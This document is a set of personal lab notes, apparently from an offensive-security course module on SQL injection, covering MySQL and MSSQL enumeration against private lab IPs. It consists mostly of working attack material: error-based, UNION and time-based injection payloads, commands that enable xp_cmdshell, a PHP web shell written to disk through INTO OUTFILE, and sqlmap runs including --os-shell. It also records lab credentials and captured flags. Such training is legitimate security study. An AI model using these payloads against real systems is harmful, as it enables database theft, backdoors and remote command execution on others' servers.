SQL Injection Attacks

SQL Theory and Databases

mysql:
mysql -u root -p'root' -h 192.168.50.16 -P 3306 --skip-ssl-verify-server-cert
select version();
select system_user();
show databases;
SELECT user, authentication_string FROM mysql.user WHERE user = 'offsec';

mssql:
impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
SELECT @@version;
SELECT name FROM sys.databases;
SELECT * FROM offsec.information_schema.tables;
select * from offsec.dbo.users;

attacker 192.168.49.52
target 192.168.52.16

connect to the remote MySQL instance on VM 3 and explore the users table present in one of the databases to get the flag

mysql -u root -p'root' -h 192.168.52.16 -P 3306 --skip-ssl-verify-server-cert
show databases;
use test;
show tables;
select * from users;
OS{a37e54c8915522ad4505db5117448f07} 

--------
Manual SQL Exploitation

Identifying SQLi via Error-based Payloads (in-band)

SELECT * FROM users WHERE user_name= 'offsec' OR 1=1 --
offsec' OR 1=1 -- //

' or 1=1 in (select @@version) -- //

' OR 1=1 in (SELECT * FROM users) -- //
' or 1=1 in (SELECT password FROM users) -- //
' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //

UNION-based Payloads (in-band)

$query = "SELECT * from customers WHERE name LIKE '".$_POST["search_input"]."%'";
(the percent sign (%) is a wildcard character primarily used with the LIKE operator to perform pattern matching)

' ORDER BY 1-- //
%' UNION SELECT 'a1', 'a2', 'a3', 'a4', 'a5' -- //
%' UNION SELECT database(), user(), @@version, null, null -- //
' UNION SELECT null, null, database(), user(), @@version  -- //

' union select null, table_name, column_name, table_schema, null from information_schema.columns where table_schema=database() -- //
' UNION SELECT null, username, password, description, null FROM users -- //

Blind SQL Injections (inferential, not out-of-band)

boolean based:
http://192.168.50.16/blindsqli.php?user=offsec' AND 1=1 -- //

time-based:
http://192.168.50.16/blindsqli.php?user=offsec' AND IF (1=1, sleep(3),'false') -- //

--------
Manual and Automated Code Execution

mssql:
impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';

' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //
(webshell.php: <? system($_REQUEST['cmd']); ?>)
192.168.120.19/tmp/webshell.php?cmd=id

Automating the Attack

sqlmap

scan sqli vulnerability and select attack method:
sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user

dump db:
sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump

sqlmap -r post.txt -p item  --os-shell  --web-root "/var/www/html/tmp"
4 (php)
id
y
pwd
y

attacker 192.168.49.52
target 192.168.52.47

Enumerate the Learning Module Exercise - VM #1 and exploit the SQLi vulnerability to get the flag

192.168.52.47 alvida-eatery.org

nmap -sC -sV alvida-eatery.org
20, 80/tcp

gobuster dir -u http://alvida-eatery.org -w /usr/share/wordlists/dirb/big.txt
css, images, js

sqlmap -u http://192.168.52.47/index.html?user=1 -p user

GET parameter 'user' does not seem to be injectable, all tested parameters do not appear to be injectable !

sqlmap -u http://192.168.52.47/index.html?id=1

GET parameter 'id' does not seem to be injectable !


 








